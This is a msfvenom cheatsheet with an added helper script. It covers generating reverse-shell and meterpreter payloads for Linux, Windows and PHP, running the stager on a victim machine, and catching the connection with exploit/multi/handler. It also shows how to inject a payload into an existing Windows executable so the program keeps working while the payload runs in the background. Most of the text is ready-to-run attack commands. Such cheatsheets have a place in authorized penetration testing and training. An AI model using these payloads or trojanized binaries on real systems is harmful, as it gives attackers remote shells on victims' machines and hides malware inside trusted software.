msfvenom

cheatsheet

Create a Reverse Shell in Linux with a Staged Payload

To search for payloads:

└─$ msfvenom  --list payloads | grep x64 | grep linux | grep reverse
    linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    linux/x64/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/pingback_reverse_tcp                      Connect back to attacker and report UUID (Linux x64)
    linux/x64/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    linux/x64/shell_reverse_ipv6_tcp                    Connect back to attacker and spawn a command shell over IPv6
    linux/x64/shell_reverse_tcp                         Connect back to attacker and spawn a command shell

Pick the staged shell payload linux/x64/shell/reverse_tcp. LHOST must be the address the target can reach the attacker on; 127.0.0.1 as used here only works when the stager is run on the attacking machine itself:

$ msfvenom -p linux/x64/shell/reverse_tcp lhost=127.0.0.1 lport=5353 -f elf -o reverse5353

Transfer the resulting ELF to the target machine and make it executable:

$ chmod +x reverse5353

Before running it, set up a listener on Kali with exploit/multi/handler using the same payload, LHOST and LPORT. The stager only carries the connect-back code; the handler delivers the rest of the payload (the stage), so if no handler is listening the stager just exits.

Finally, run the stager on the victim's machine:

$ ./reverse5353

It connects back to Kali, downloads the stage from the handler, and a command shell session opens in msfconsole.

(optional) upgrade the shell to a meterpreter session with the post/multi/manage/shell_to_meterpreter module
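The steps above (and the listener lines in the Windows and PHP sections) all depend on the msfvenom payload and the exploit/multi/handler listener agreeing on payload, LHOST and LPORT. The script below is an added example, not part of the original cheatsheet: it derives both from one set of arguments, rejects an LHOST a remote victim could never reach, and writes the handler as an msfconsole resource file. The helper names, the 10.10.14.5 address and the output file names are assumptions for illustration; msfvenom itself only runs when the script is invoked with --run.

```shell
#!/bin/sh
# Added example (not from the original cheatsheet): keep the msfvenom payload
# and the exploit/multi/handler listener in sync. The stager only works if the
# handler is started first with the SAME payload, LHOST and LPORT, so both are
# generated from one set of variables. Names and addresses are assumptions.

# Reject LHOST values that cannot be reached from a remote victim.
# 127.0.0.1 only works when the stager runs on the attacking box itself;
# on a real target it would make the stager connect back to the target.
check_lhost() {
    case "$1" in
        127.*|0.0.0.0|localhost|"") return 1 ;;
        *) return 0 ;;
    esac
}

# Print (do not execute) the msfvenom command for the given payload so the
# exact command can be reviewed or logged before anything is generated.
venom_cmd() {
    payload="$1"; lhost="$2"; lport="$3"; fmt="$4"; out="$5"
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o %s\n' \
        "$payload" "$lhost" "$lport" "$fmt" "$out"
}

# Print an msfconsole resource script that catches that payload.
# "exploit -j -z" backgrounds the handler without auto-interacting with the
# session; ExitOnSession false keeps it listening for further callbacks.
handler_rc() {
    payload="$1"; lhost="$2"; lport="$3"
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Only act when called as: ./stage.sh --run PAYLOAD LHOST LPORT FORMAT OUTFILE
# e.g. ./stage.sh --run linux/x64/shell/reverse_tcp 10.10.14.5 5353 elf reverse5353
if [ "${1:-}" = "--run" ]; then
    shift
    [ $# -eq 5 ] || { echo "usage: $0 --run PAYLOAD LHOST LPORT FORMAT OUTFILE" >&2; exit 2; }
    check_lhost "$2" || { echo "LHOST $2 is not reachable from a remote target" >&2; exit 1; }
    cmd=$(venom_cmd "$@")
    echo "+ $cmd"
    sh -c "$cmd"                      # requires msfvenom on PATH
    handler_rc "$1" "$2" "$3" > handler.rc
    echo "handler written to handler.rc; start it with: msfconsole -q -r handler.rc"
    echo "then transfer $5 to the target, chmod +x $5, and run it"
fi
```

Start the handler with `msfconsole -q -r handler.rc` before the stager is executed on the target; the same script works for the Windows and PHP payloads below by changing the payload name and format (exe / raw).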

Create a payload for Windows

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.23.10 LPORT=4444 -a x86 -f exe > output.exe

Create a reverse shell payload in PHP

$ msfvenom -p php/meterpreter_reverse_tcp lhost=<my-ip> lport=<port> -o shell.php

Set up a listener with the same payload using exploit/multi/handler (php/meterpreter_reverse_tcp is stageless, but the handler still has to be configured with that exact payload name).

Inject Payload into an Executable

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=5353 -f exe -e x86/shikata_ga_nai -i 15 -k -x service_bak.exe > service.exe
  • -x: Specify an existing executable to use as a template and inject the payload into
  • -k: Preserve the template's original behavior and run the payload in a new thread (does not work with every template; without -k the template's own functionality is replaced by the payload)
  • -e x86/shikata_ga_nai -i 15: Encode the payload 15 times with shikata_ga_nai. Encoders exist for bad-character avoidance; repeated encoding makes the binary larger and is well known to AV engines, so do not rely on it for evasion. The template and payload architecture must match (here both x86).

To check encoding options:

msfvenom -l encoders